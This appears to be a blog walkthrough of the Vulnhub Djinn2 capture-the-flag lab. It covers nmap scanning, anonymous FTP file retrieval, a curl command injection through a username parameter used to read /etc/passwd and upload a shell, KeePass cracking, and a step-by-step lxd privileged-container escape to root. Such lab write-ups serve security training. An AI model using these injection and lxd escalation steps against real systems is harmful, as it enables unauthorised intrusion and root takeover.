Vulnhub – Djinn2 Walkthrough

Scanning the target with nmap –A –T4 –p- 192.168.1.17 –vv

We got an ftp port which allows anonymous login, we get 3 text files we can download:

Cred.txt file: nitu:7846A$56

Game.txt file: @0xmzfr I would like to thank you for hiring me. I won’t disappoint you like SAM.

Also I’ve started implementing the secure way of authorizing the access to our network. I have provided @nitish81299 with the beta version of the key fob hopes everything would be good.

– @Ugtan_

Message.txt file: @nitish81299, you and Sam messed it all up. I’ve fired Sam for all the fuzz he created and this will be your last warning if you won’t put your shit together than you’ll be gone as well.

I’ve hired @Ugtan_ as our new security head, hope he’ll do something good.

– @0xmzfr

Using gobuster on port 7331 came with two new paths one of them is a text file Source.txt:

The source file when we run it as python file it doesn’t do anything and it says wrong ip address, so after 3 days i found a pdf file about this line exactly URL = http://{}:5000/?username={}&password={} where we do a CURL on it to retrieve some information from the host, ( just google it):

curl -X POST http://192.168.1.2:5000/?username=id&password=

i was able to cat the /etc/passwd file and upload a shell to the tmp folder, i used different types of shells but finallythe one that worked is the binary shell code as our shell file SHELL:

And then upload the shell code to the target machine and give it a 777 mode:

On our machine we start a meterpreter session:

Now I’ve looked for a while and did all the find commands till i found a file nitu.kdbx in the /var/backups folder which is a Keepass file we can crack it on our machine using nitu:7846A$56, first transfer the file with scp nitu.kdbx root@192.168.1.11:/root/ and we are going to use, and search for keepass to install:

In the terminal we right keepass2, a windows will pop up and we browse for the file and we inter the password 7846A$56 after that we do a right click and copy password

Now we go back to our shell ad su nitish with the new password:

The user is a part of lxd group which we can exploit, so we’re going to download the alpin builder from this link and follow the steps https://github.com/saghul/lxd-alpine-builder.git

After that copy the file to the host using wget.

Put these commands in order and you will get the root shell:

lxd init

it will ask us few questions keep it to their defaults

lxc image import alpine-v3.3-x86_64-20160114_2308.tar.gz –alias myimage

lxc image list

lxc init myimage hacker -c security.privileged=true

lxc config device add hacker mydevice disk source=/ path=/mnt/root recursive=true

lxc start hacker

lxc exec hacker /bin/sh

and finally the root path will be mounted under /mnt/root/root where we can run the proof.sh

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s